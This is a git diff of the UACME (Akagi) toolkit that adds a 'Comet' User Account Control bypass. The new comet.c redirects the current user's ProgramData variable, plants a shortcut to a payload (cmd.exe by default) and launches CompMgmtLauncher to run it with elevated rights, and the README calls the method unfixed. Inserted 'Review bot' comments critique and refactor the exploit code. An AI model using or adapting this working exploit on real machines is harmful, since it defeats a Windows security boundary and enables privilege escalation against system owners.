diff --git a/Compiled/Akagi32.exe b/Compiled/Akagi32.exe index d5d9b3d..6592105 100644 Binary files a/Compiled/Akagi32.exe and b/Compiled/Akagi32.exe differ diff --git a/Compiled/Akagi64.exe b/Compiled/Akagi64.exe index 00b33e5..3a10123 100644 Binary files a/Compiled/Akagi64.exe and b/Compiled/Akagi64.exe differ diff --git a/README.md b/README.md index 20e7beb..844a78c 100644 --- a/README.md +++ b/README.md @@ -35,7 +35,8 @@ Keys (watch debug ouput with dbgview or similar for more info): * 20 - Hybrid method, abusing Microsoft Management Console and incorrect dll loading scheme, works from Windows 7 up to 10rs2 14997; * 21 - Hybrid method, abusing SxS DotLocal and targeting sysprep, works from Windows 7 up to 10rs2 14997; * 22 - Hybrid method, abusing SxS DotLocal and targeting consent to gain system privileges, works from Windows 7 up to 10rs2 14997; -* 23 - Hybrid method, abusing Package Manager and DISM, works from Windows 7 up to 10rs2 14997. +* 23 - Hybrid method, abusing Package Manager and DISM, works from Windows 7 up to 10rs2 14997; +* 24 - Original Comet method from BreakingMalware, abuses current user environment variables and CompMgmtLauncher.exe, works from Windows 7 up to 10rs2 15007. Note: * Several methods require process injection, so they won't work from wow64, use x64 edition of this tool; @@ -85,7 +86,7 @@ Methods fixed: * 22 - Windows 10 RS2 starting from public 1500X build (delivery interface altered, method itself still work); * 23 - Windows 10 RS2 starting from public 1500X build (delivery interface altered, method itself still work). -Currently, 16 January 2017 Windows 10 RS2 starting from 1500X builds is the most protected Microsoft OS ever made. +** 24 is not fixed as at 17 January 2017. If you wondering why this still exist and work here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as bonus) 
@@ -105,8 +106,8 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105 # VirusTotal reference report -* Akagi32 https://www.virustotal.com/en/file/4804d5dea63b2ee5629712f79ce9d655823e33cf721640fba22411f116ba867b/analysis/ -* Akagi64 https://www.virustotal.com/en/file/9b0a1c6bbc11cd3e2203b47dcf3e44be6e6a74763dfa56298dfb8dacade477a5/analysis/ +* Akagi32 https://www.virustotal.com/en/file/f662645187d424cbaad77fb597a2071befd16298f180f89a066fcc3a8ebfebcc/analysis/ +* Akagi64 https://www.virustotal.com/en/file/2ffcae26fce95ab0e87814968ce5d4401d0778020d25114ae01da4d08d64cf17/analysis/ # Build @@ -120,6 +121,7 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105 * Junfeng Zhang from WinSxS dev team blog, https://blogs.msdn.microsoft.com/junfeng/ * Beyond good ol' Run key, series of articles, http://www.hexacorn.com/blog * KernelMode.Info UACMe thread, http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643 +* Command Injection/Elevation – Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited # Authors diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc index 1e36bb9..1fed8a8 100644 Binary files a/Source/Akagi/Resource.rc and b/Source/Akagi/Resource.rc differ diff --git a/Source/Akagi/comet.c b/Source/Akagi/comet.c new file mode 100644 index 0000000..3b7eb76 --- /dev/null +++ b/Source/Akagi/comet.c 
@@ -0,0 +1,188 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2016 - 2017
+*
+* TITLE: COMET.C
+*
+* VERSION: 2.52
+*
+* DATE: 17 Jan 2017
+*
+* Comet method (c) BreakingMalware
+* For description please visit original URL
+* https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+#include
+#include
+
+/*
+* ucmSetEnvVariable
+*
+* Purpose:
+*
+* Remove of set current user environment variable.
+*
+*/
+BOOL ucmSetEnvVariable(
+ _In_ BOOL fRemove,
+ _In_ LPWSTR lpVariableName,
+ _In_opt_ LPWSTR lpVariableData
+ )
+{
+ BOOL bResult = FALSE, bCond = FALSE;
+ HKEY hKey = NULL;
+
+ do {
+ if (lpVariableName == NULL)
+ break;
+
+ if ((lpVariableData == NULL) && (fRemove != TRUE))
+ break;
+
+ if (RegOpenKey(HKEY_CURRENT_USER, L"Environment", &hKey) != ERROR_SUCCESS)
+ break;
+
+ if (fRemove) {
+ RegDeleteValue(hKey, lpVariableName);
+ }
+ else {
+ if (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ, (BYTE*)lpVariableData,
+ (DWORD)(_strlen(lpVariableData) * sizeof(WCHAR))) != ERROR_SUCCESS)
+ {
+ break;
+ }
+ }
+ bResult = TRUE;
+
+ } while (bCond);
+
+ return bResult;
+}
+
+/*
+* ucmCometMethod
+*
+* Purpose:
+*
+* Fool autoelevated application with help of manipulation of the current user environment variables.
+* CompMgmtLauncher.exe is a moronic .LNK ShellExecute launcher application.
+* Only MS do system trusted applications which only purpose is to LAUNCH .LNK files.
+*
+*/
+BOOL ucmCometMethod(
+ LPWSTR lpszPayload
+ )
+{
+#ifndef _WIN64
+ PVOID OldValue = NULL;
+#endif
+
+ BOOL bCond = FALSE, bResult = FALSE;
+ WCHAR szCombinedPath[MAX_PATH * 2], szLinkFile[MAX_PATH * 3];
+ HRESULT hResult;
+
+ IPersistFile *persistFile = NULL;
+ IShellLink *newLink = NULL;
+
+#ifndef _WIN64
+ if (g_ctx.IsWow64) {
+ if (!NT_SUCCESS(RtlWow64EnableFsRedirectionEx((PVOID)TRUE, &OldValue)))
+ return FALSE;
+ }
+#endif
+
+ do {
+
+ RtlSecureZeroMemory(szCombinedPath, sizeof(szCombinedPath));
+ _strcpy(szCombinedPath, g_ctx.szTempDirectory);
+ _strcat(szCombinedPath, L"huy32");
+ if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet
+ if (GetLastError() != ERROR_ALREADY_EXISTS)
+ break;
+ }
+
+ _strcpy(szLinkFile, szCombinedPath);
+ _strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET);
+ if (!CreateDirectory(szLinkFile, NULL)) {//%temp%\\Comet.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
+ if (GetLastError() != ERROR_ALREADY_EXISTS)
+ break;
+ }
+
+ if (!ucmSetEnvVariable(FALSE, T_PROGRAMDATA, szCombinedPath))
+ break;
+
+ _strcat(szCombinedPath, TEXT("\\Microsoft"));
+ if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft
+ if (GetLastError() != ERROR_ALREADY_EXISTS)
+ break;
+ }
+
+ _strcat(szCombinedPath, TEXT("\\Windows"));
+ if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows
+ if (GetLastError() != ERROR_ALREADY_EXISTS)
+ break;
+ }
+
+ _strcat(szCombinedPath, TEXT("\\Start Menu"));
+ if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu
+ if (GetLastError() != ERROR_ALREADY_EXISTS)
+ break;
+ }
+
+ _strcat(szCombinedPath, TEXT("\\Programs"));
+ if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu\Programs
+ if (GetLastError() != ERROR_ALREADY_EXISTS)
+ break;
+ }
+
+ _strcat(szCombinedPath, TEXT("\\Administrative Tools"));
+ if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu\Programs\Administrative Tools
+ if (GetLastError() != ERROR_ALREADY_EXISTS)
+ break;
+ }
+
+ hResult = CoInitialize(NULL);
+ if (SUCCEEDED(hResult)) {
+ hResult = CoCreateInstance(&CLSID_ShellLink, NULL, CLSCTX_INPROC_SERVER, &IID_IShellLink, (LPVOID *)&newLink);
+ if (SUCCEEDED(hResult)) {
+ newLink->lpVtbl->SetPath(newLink, lpszPayload);
+ newLink->lpVtbl->SetArguments(newLink, L"");
+ newLink->lpVtbl->SetDescription(newLink, L"Comet method");
+ hResult = newLink->lpVtbl->QueryInterface(newLink, &IID_IPersistFile, (void **)&persistFile);
+ if (SUCCEEDED(hResult)) {
+ _strcpy(szLinkFile, szCombinedPath);
+ _strcat(szLinkFile, L"\\Computer Management.lnk");
+ if (SUCCEEDED(persistFile->lpVtbl->Save(persistFile, szLinkFile, TRUE))) {
+ persistFile->lpVtbl->Release(persistFile);
+
+ _strcpy(szCombinedPath, g_ctx.szTempDirectory);
+ _strcat(szCombinedPath, L"huy32");
+ _strcpy(szLinkFile, szCombinedPath);
+ _strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET);
+
+ ShellExecute(NULL, L"Manage", szLinkFile, L"", szCombinedPath, SW_SHOW);
+ bResult = TRUE;
+ }
+ }
+ newLink->lpVtbl->Release(newLink);
+ }
+ }
+
+ } while (bCond);
+
+#ifndef _WIN64
+ if (g_ctx.IsWow64) {
+ RtlWow64EnableFsRedirectionEx(OldValue, &OldValue);
+ }
+#endif
+
+ ucmSetEnvVariable(TRUE, T_PROGRAMDATA, NULL);
+ return bResult;
+}
diff --git a/Source/Akagi/comet.h b/Source/Akagi/comet.h
new file mode 100644
index 0000000..1bd3967
--- /dev/null
+++ b/Source/Akagi/comet.h
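Review bot: ucmSetEnvVariable opens HKCU\Environment with RegOpenKey but never closes hKey on any path, and on the removal path the RegDeleteValue result is discarded, so the trailing `ucmSetEnvVariable(TRUE, T_PROGRAMDATA, NULL)` in ucmCometMethod reports success even when the ProgramData override is left behind. Add `if (hKey != NULL) RegCloseKey(hKey);` after the do/while and derive bResult from the RegDeleteValue return value instead of setting it unconditionally. In ucmCometMethod, persistFile is released only when Save succeeds and CoInitialize has no matching CoUninitialize, so the failure path leaks the COM object; the directory tree built under szCombinedPath is never removed either, so together with the registry value it is what a responder would find left on the host after a run. The inline path comments (`//%temp%\Comet`, `//%temp%\Comet\Microsoft`, …) also disagree with the `L"huy32"` component the code actually appends; they should name the directory that is really created.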
@@ -0,0 +1,23 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2016 - 2017 +* +* TITLE: COMET.H +* +* VERSION: 2.52 +* +* DATE: 17 Jan 2017 +* +* Prototypes and definitions for Comet method. +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ +#pragma once + +BOOL ucmCometMethod( + LPWSTR lpszPayload + ); diff --git a/Source/Akagi/consts.h b/Source/Akagi/consts.h index 2c28916..f86ab9e 100644 --- a/Source/Akagi/consts.h +++ b/Source/Akagi/consts.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015 - 2016 +* (C) COPYRIGHT AUTHORS, 2015 - 2017 * * TITLE: CONSTS.H * -* VERSION: 2.51 +* VERSION: 2.52 * -* DATE: 11 July 2016 +* DATE: 17 Jan 2017 * * Global consts definition file. * @@ -31,7 +31,9 @@ #define T_IID_ISecurityEditor L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}" #define ISECURITYEDITOR_ELEMONIKER L"Elevation:Administrator!new:{4D111E08-CBF7-4f12-A926-2C7920AF52FC}" #define IFILEOP_ELEMONIKER L"Elevation:Administrator!new:{3AD05575-8857-4850-9277-11B85BDB8E09}" +#define T_CLSID_MYCOMPUTER_COMET L"\\Comet.{20D04FE0-3AEA-1069-A2D8-08002B30309D}" #define T_SDDL_ALL_FOR_EVERYONE L"D:(A;;GA;;;WD)" +#define T_PROGRAMDATA L"ProgramData" #define MANIFEST_EXT L".manifest" #define ELLOCNAK_MSU L"ellocnak.msu" @@ -56,7 +58,6 @@ #define DEVOBJ_DLL L"devobj.dll" #define UNBCL_DLL L"unbcl.dll" #define DISMCORE_DLL L"dismcore.dll" -#define WOW64LOG_DLL L"wow64log.dll" #define CLICONFG_EXE L"cliconfg.exe" #define OOBE_EXE L"oobe.exe" #define WINSAT_EXE L"winsat.exe" 
@@ -82,6 +83,8 @@ #define RSOP_MSC L"rsop.msc" #define PACKAGE_XML L"ellocnak.xml" +#define T_DEFAULT_CMD L"%systemroot%\\system32\\cmd.exe" + #define LOCAL_SXS L".local" #define FAKE_LOCAL_SXS L".hawawa" #define INETMGR_SXS L"microsoft-windows-iis-managementconsole" diff --git a/Source/Akagi/global.h b/Source/Akagi/global.h index 1b28602..ebd2a54 100644 --- a/Source/Akagi/global.h +++ b/Source/Akagi/global.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2016 +* (C) COPYRIGHT AUTHORS, 2014 - 2017 * * TITLE: GLOBAL.H * -* VERSION: 2.51 +* VERSION: 2.52 * -* DATE: 10 July 2016 +* DATE: 17 Jan 2017 * * Common header file for the program support routines. * @@ -77,7 +77,7 @@ typedef enum _UACBYPASSMETHOD { UacMethodSXS, UacMethodSXSConsent, UacMethodDISM, - //UacMethod24, + UacMethodComet, UacMethodMax } UACBYPASSMETHOD; @@ -97,6 +97,7 @@ typedef enum _UACBYPASSMETHOD { #include "simda.h" #include "carberp.h" #include "hybrids.h" +#include "comet.h" //default execution flow #define AKAGI_FLAG_KILO 0 diff --git a/Source/Akagi/gootkit.c b/Source/Akagi/gootkit.c index b92bbee..577aab2 100644 --- a/Source/Akagi/gootkit.c +++ b/Source/Akagi/gootkit.c @@ -1,13 +1,13 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2016, +* (C) COPYRIGHT AUTHORS, 2014 - 2017, * (C) MS FixIT Shim Patches revealed by Jon Erickson * * TITLE: GOOTKIT.C * -* VERSION: 2.51 +* VERSION: 2.52 * -* DATE: 11 July 2016 +* DATE: 17 Jan 2017 * * Gootkit based AutoElevation using AppCompat. * @@ -487,7 +487,7 @@ BOOL ucmAppcompatElevation( if (Method == UacMethodRedirectExe) { if (lpszPayloadEXE == NULL) { - _strcpy_w(szBuffer, L"%systemroot%\\system32\\cmd.exe"); + _strcpy_w(szBuffer, T_DEFAULT_CMD); bResult = ucmShimRedirectEXE(szBuffer); } else { diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c index c99cf8f..966c2bf 100644 
--- a/Source/Akagi/main.c +++ b/Source/Akagi/main.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2016 +* (C) COPYRIGHT AUTHORS, 2014 - 2017 * * TITLE: MAIN.C * -* VERSION: 2.51 +* VERSION: 2.52 * -* DATE: 11 July 2016 +* DATE: 17 Jan 2017 * * Program entry point. * @@ -485,6 +485,11 @@ UINT ucmMain() ucmShowMessage(WIN64ONLY); return ERROR_UNSUPPORTED_TYPE; #else + //fixed in 15007 + if (g_ctx.dwBuildNumber > 14997) { + if (ucmShowQuestion(UACFIX) == IDNO) + return ERROR_UNSUPPORTED_TYPE; + } #endif break; @@ -493,6 +498,11 @@ UINT ucmMain() ucmShowMessage(WIN64ONLY); return ERROR_UNSUPPORTED_TYPE; #else + //fixed in 15007 + if (g_ctx.dwBuildNumber > 14997) { + if (ucmShowQuestion(UACFIX) == IDNO) + return ERROR_UNSUPPORTED_TYPE; + } #endif break; @@ -501,6 +511,11 @@ UINT ucmMain() ucmShowMessage(WIN64ONLY); return ERROR_UNSUPPORTED_TYPE; #else + //fixed in 15007 + if (g_ctx.dwBuildNumber > 14997) { + if (ucmShowQuestion(UACFIX) == IDNO) + return ERROR_UNSUPPORTED_TYPE; + } #endif break; @@ -509,9 +524,16 @@ UINT ucmMain() ucmShowMessage(WIN64ONLY); return ERROR_UNSUPPORTED_TYPE; #else + //fixed in 15007 + if (g_ctx.dwBuildNumber > 14997) { + if (ucmShowQuestion(UACFIX) == IDNO) + return ERROR_UNSUPPORTED_TYPE; + } #endif break; + case UacMethodComet: + break; } //prepare command for payload @@ -519,7 +541,7 @@ UINT ucmMain() RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, ¶mLen); if (paramLen > 0) { - if (g_ctx.Method != UacMethodRedirectExe) { + if ((g_ctx.Method != UacMethodRedirectExe) && (g_ctx.Method != UacMethodComet)) { supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR)); } } @@ -743,6 +765,11 @@ UINT ucmMain() break; #endif + case UacMethodComet: + if (ucmCometMethod((paramLen != 0) ? szBuffer : T_DEFAULT_CMD)) { + return ERROR_SUCCESS; + } + break; } 
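Review bot: The four `//fixed in 15007` blocks added to ucmMain are byte-identical copies, and each pairs a comment naming build 15007 with a guard that tests `g_ctx.dwBuildNumber > 14997`, so a reader cannot tell which build the cutoff is meant to be; ucmMain begins and ends outside these hunks. Factor the check into one static helper that is documented once, call it from the four cases, and make the comment and the threshold agree. The bare `case UacMethodComet: break;` added to the first switch is presumably deliberate (no WOW64 restriction for this method), but a one-line comment saying so would make that explicit alongside the annotated cases.
```c
// Warns the operator that the selected method is known to be fixed on builds
// newer than dwLastWorkingBuild; returns FALSE when they choose not to continue.
static BOOL ucmConfirmIfFixed(DWORD dwLastWorkingBuild)
{
    if (g_ctx.dwBuildNumber > dwLastWorkingBuild) {
        if (ucmShowQuestion(UACFIX) == IDNO)
            return FALSE;
    }
    return TRUE;
}

/* … unchanged: ucmMain up to the per-method switch; each copied block becomes … */
        if (!ucmConfirmIfFixed(14997))
            return ERROR_UNSUPPORTED_TYPE;
```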
diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj index 9d5493b..149a641 100644 --- a/Source/Akagi/uacme.vcxproj +++ b/Source/Akagi/uacme.vcxproj @@ -240,6 +240,7 @@ + @@ -255,6 +256,7 @@ + diff --git a/Source/Akagi/uacme.vcxproj.filters b/Source/Akagi/uacme.vcxproj.filters index 1c48a4c..9cd8b20 100644 --- a/Source/Akagi/uacme.vcxproj.filters +++ b/Source/Akagi/uacme.vcxproj.filters @@ -87,6 +87,9 @@ minirtl + + Source Files + @@ -137,6 +140,9 @@ Header Files + + Header Files + diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user index dcfc012..91181ba 100644 --- a/Source/Akagi/uacme.vcxproj.user +++ b/Source/Akagi/uacme.vcxproj.user @@ -9,11 +9,11 @@ WindowsLocalDebugger - 23 + 24 WindowsLocalDebugger - 23 + 24 WindowsLocalDebugger \ No newline at end of file diff --git a/Source/Shared/ntos.h b/Source/Shared/ntos.h index d3dbaac..464e083 100644 --- a/Source/Shared/ntos.h +++ b/Source/Shared/ntos.h @@ -1,12 +1,12 @@ /************************************************************************************ * -* (C) COPYRIGHT AUTHORS, 2015 - 2016, translated from Microsoft sources/debugger +* (C) COPYRIGHT AUTHORS, 2015 - 2017, translated from Microsoft sources/debugger * * TITLE: NTOS.H * -* VERSION: 1.47 +* VERSION: 1.51 * -* DATE: 10 July 2016 +* DATE: 18 Jan 2017 * * Common header file for the ntos API functions and definitions. * @@ -109,6 +109,18 @@ #define TRACELOG_ACCESS_REALTIME 0x0400 #define TRACELOG_REGISTER_GUIDS 0x0800 +// +// Partition Specific Access Rights. +// + +#define MEMORY_PARTITION_QUERY_ACCESS 0x0001 +#define MEMORY_PARTITION_MODIFY_ACCESS 0x0002 + +#define MEMORY_PARTITION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | \ + SYNCHRONIZE | \ + MEMORY_PARTITION_QUERY_ACCESS | \ + MEMORY_PARTITION_MODIFY_ACCESS) + #define NtCurrentThread() ( (HANDLE)(LONG_PTR) -2 ) #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) #define ZwCurrentProcess() NtCurrentProcess() 
@@ -128,6 +140,15 @@ #define MAXUSHORT 0xffff #define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) ) +typedef struct _EX_RUNDOWN_REF +{ + union + { + ULONG Count; + PVOID Ptr; + }; +} EX_RUNDOWN_REF, *PEX_RUNDOWN_REF; + typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; @@ -204,6 +225,19 @@ typedef struct _SEMAPHORE_BASIC_INFORMATION { ** Semaphore END */ +/* +** Kernel Debugger START +*/ + +typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION { + BOOLEAN KernelDebuggerEnabled; + BOOLEAN KernelDebuggerNotPresent; +} SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION; + +/* +** Kernel Debugger END +*/ + /* ** FileCache and MemoryList START */ @@ -4171,8 +4205,9 @@ typedef struct _KUSER_SHARED_DATA_COMPAT { ULONG DbgDynProcessorEnabled : 1; ULONG DbgConsoleBrokerEnabled : 1; ULONG DbgSecureBootEnabled : 1; - ULONG DbgMultiSessionSku : 1; - ULONG SpareBits : 23; + ULONG DbgMultiSessionSku : 1; + ULONG DbgMultiUsersInSessionSku : 1; + ULONG SpareBits : 22; }; }; @@ -4186,6 +4221,44 @@ typedef struct _KUSER_SHARED_DATA_COMPAT { ** KUSER_SHARED_DATA END */ +/* +** FLT MANAGER START +*/ + +#define FLTFL_MANDATORY_UNLOAD_IN_PROGRESS 0x1 +#define FLTFL_FILTERING_INITIATED 0x2 +#define FLTFL_NAME_PROVIDER 0x4 +#define FLTFL_SUPPORTS_PIPES_MAILSLOTS 0x8 + +#define FLT_OBFL_DRAINING 0x1 +#define FLT_OBFL_ZOMBIED 0x2 +#define FLT_OBFL_TYPE_INSTANCE 0x1000000 +#define FLT_OBFL_TYPE_FILTER 0x2000000 +#define FLT_OBFL_TYPE_VOLUME 0x4000000 + +typedef struct _FLT_OBJECT { + ULONG Flags; + ULONG PointerCount; + EX_RUNDOWN_REF RundownRef; + LIST_ENTRY PrimaryLink; +} FLT_OBJECT, *PFLT_OBJECT; + +typedef struct _FLT_SERVER_PORT_OBJECT { + LIST_ENTRY FilterLink; + PVOID ConnectNotify; + PVOID DisconnectNotify; + PVOID MessageNotify; + PVOID Filter; + PVOID Cookie; + ULONG Flags; + ULONG NumberOfConnections; + ULONG MaxConnections; +} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT; + +/* +** FLT MANAGER END +*/ + /* ** RTL START */ 
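Review bot: EX_RUNDOWN_REF in the `@@ -128,6 +140,15 @@` hunk declares `Count` as ULONG, whereas the public WDK definition, as far as I recall it, uses ULONG_PTR so that `Count` and `Ptr` have the same width. The union stays pointer-sized on x64 because of `Ptr`, so the FLT_OBJECT layout added later in this file is unaffected, but a 64-bit read of `Count` would see only the low 32 bits. Change the member to `ULONG_PTR Count;`; nothing in this commit reads the field, so it is a latent rather than an active defect.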
@@ -4574,6 +4647,16 @@ VOID NTAPI RtlSetLastWin32Error( LONG Win32Error ); + +NTSTATUS NTAPI RtlWow64EnableFsRedirection( + _In_ BOOLEAN Wow64FsEnableRedirection + ); + +NTSTATUS NTAPI RtlWow64EnableFsRedirectionEx( + _In_ PVOID DisableFsRedirection, + _Out_ PVOID *OldFsRedirectionLevel + ); + typedef NTSTATUS (NTAPI * PRTL_HEAP_COMMIT_ROUTINE)( IN PVOID Base, @@ -5775,6 +5858,14 @@ NTSTATUS NTAPI NtQuerySecurityObject( _Out_ PULONG LengthNeeded ); +NTSTATUS NTAPI NtQueryLicenseValue( + _In_ PUNICODE_STRING ValueName, + _Out_opt_ PULONG Type, + _Out_writes_bytes_to_opt_(DataSize, *ResultDataSize) PVOID Data, + _In_ ULONG DataSize, + _Out_ PULONG ResultDataSize +); + NTSTATUS NtCreateIoCompletion( _Out_ PHANDLE IoCompletionHandle, _In_ ACCESS_MASK DesiredAccess, diff --git a/UACME.sha256 b/UACME.sha256 index 1c58dab..5cec265 100644 --- a/UACME.sha256 +++ b/UACME.sha256 @@ -1,5 +1,5 @@ -4804d5dea63b2ee5629712f79ce9d655823e33cf721640fba22411f116ba867b *Compiled\Akagi32.exe -9b0a1c6bbc11cd3e2203b47dcf3e44be6e6a74763dfa56298dfb8dacade477a5 *Compiled\Akagi64.exe +f662645187d424cbaad77fb597a2071befd16298f180f89a066fcc3a8ebfebcc *Compiled\Akagi32.exe +2ffcae26fce95ab0e87814968ce5d4401d0778020d25114ae01da4d08d64cf17 *Compiled\Akagi64.exe 098e6b9ca3c24b8d3dc8c2eb1a8ed8a07ca7248de1395e0ab4b515ff55a6eae4 *Source\uacme.sln 8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico 02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest 
@@ -10,29 +10,31 @@ a482ae2d4e1d0a8a1fe69e70c616800cc4cdab41d77bcbf3f391911eb8f3f44d *Source\Akagi\b e087dfb09004d72749ffa94e016860683a7c20f147346e1acf0f561da400e9f1 *Source\Akagi\bin64res.rc 31561a29aeef347b9eb2d763dd13ec5efbf524309ae3e73009e916d5a298213e *Source\Akagi\carberp.c 35ed70e08dc96bedc4d332edb36799fcee7fe8b743bce7b43a363aacfdb8dc78 *Source\Akagi\carberp.h +1edbced7c0e0a4623e94cc0cf5eb0b0a892055efdbe120ec99740e7095669ca0 *Source\Akagi\comet.c +ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\comet.h fce0f9f17b98675ea322c9f1729c73c56467fbb68335e86417517e6fd549f630 *Source\Akagi\compress.c be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h -da4ec050a3d7b306021e1f66af6e5eadc6222904c433f83a5e8aea2d5fc5ff15 *Source\Akagi\consts.h -b63833dd4dd9ac82abf04caa3f6d835bc15de6997377eda9763727a0a9de27c9 *Source\Akagi\global.h -027a4bf1e01d7283f72c97bacdf08b845030cc2a2631eb882793bdd22518a632 *Source\Akagi\gootkit.c +117b7a1fc984f75cafc6a9613703ef920018f1188ac241aa609dc70f71c0d208 *Source\Akagi\consts.h +3f7d65507e3c26e9bc01b67b6f305a15337d3f34114a41d1c0c387fc857f8c08 *Source\Akagi\global.h +5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h 46ca3d450773a8b39fc5caccdeabbad1bf7cef0a1694bd94284ca75c02085b38 *Source\Akagi\hybrids.c 81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h -24e72497fbdbfc3aded5843eee818bf6ab5009edbc29606f26a5959cdcaf4bfe *Source\Akagi\main.c +4d07f686c54d03cb592a03ac22b03e6012c218e8b771d45afe667fbcad92cf43 *Source\Akagi\main.c dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c 67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h 
7e3ce9159f8d80775c476bfe1e3eaed960cd0053c569ec44791936ae2546301b *Source\Akagi\pitou.c 7f8aec0ef71310198ba697c1acc8bdeff64279b039b82c6761f110bbd92e6dfb *Source\Akagi\pitou.h c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h -652a70321893ccf4ea8df0ed4a72bef230c227b3b2638174cba01717c06454b5 *Source\Akagi\Resource.rc +dc8f2a3c2bfffb5b88cbfc8ca0d99e38a44d1343ee15013858b99022c6ff2d75 *Source\Akagi\Resource.rc d84490cd98b484bb0e8af241df7500efef502525ec7249aa6a5b6f850e2bac77 *Source\Akagi\simda.c 9d25bcd377d6bc86332ac613cd99362c9881302d403a3e4e1e8c93a266982b32 *Source\Akagi\simda.h 7e2bee1be67d96edca66ea19aac60896b97449af72da653206102930ae676aca *Source\Akagi\sup.c ee7b5b03ff6401b82fae2eb453603cbb7a39d81d1bca1d0cb835e92baaaf4c2d *Source\Akagi\sup.h -520b30af34233a3c17e546d1bb3a745fe8e9819067a795ec709018da3ba8b7b2 *Source\Akagi\uacme.vcxproj -aa3c16d7e1d651a84b04c652c689b4fb1e7b81c1e390860ed0360df51483ee22 *Source\Akagi\uacme.vcxproj.filters -5ac1b51187339ca0ead48704f9ceb57ae5561eba4eee1267b8a7461dc7e4c130 *Source\Akagi\uacme.vcxproj.user +472953271f598efcd79e4a741df77188c60bfb3b2867cb7465fa068e387362a9 *Source\Akagi\uacme.vcxproj +c6986aecdf474a9ac568fd122956a016c2583156448627c1c9f60d7b08d5f306 *Source\Akagi\uacme.vcxproj.filters +69ef84d851e52fa90e78232720740a13addb67a3a72936bf159559db05085cbe *Source\Akagi\uacme.vcxproj.user a848ec296f79f6eca82202e1ebf95d69da8ab16cfa336418ce9a9e36fe81ae0c *Source\Akagi\bin\Fubuki32.cd 0cb9aff9b689c6ffb1b0f307caec4a3b67dbd459a610dcca72cd9be70a4b6094 *Source\Akagi\bin\Fubuki64.cd 0617a97e15c312915fedfc5f2eebfc2d417cfbd667896bcf9d33846334ae98a4 *Source\Akagi\bin\Hibiki32.cd 
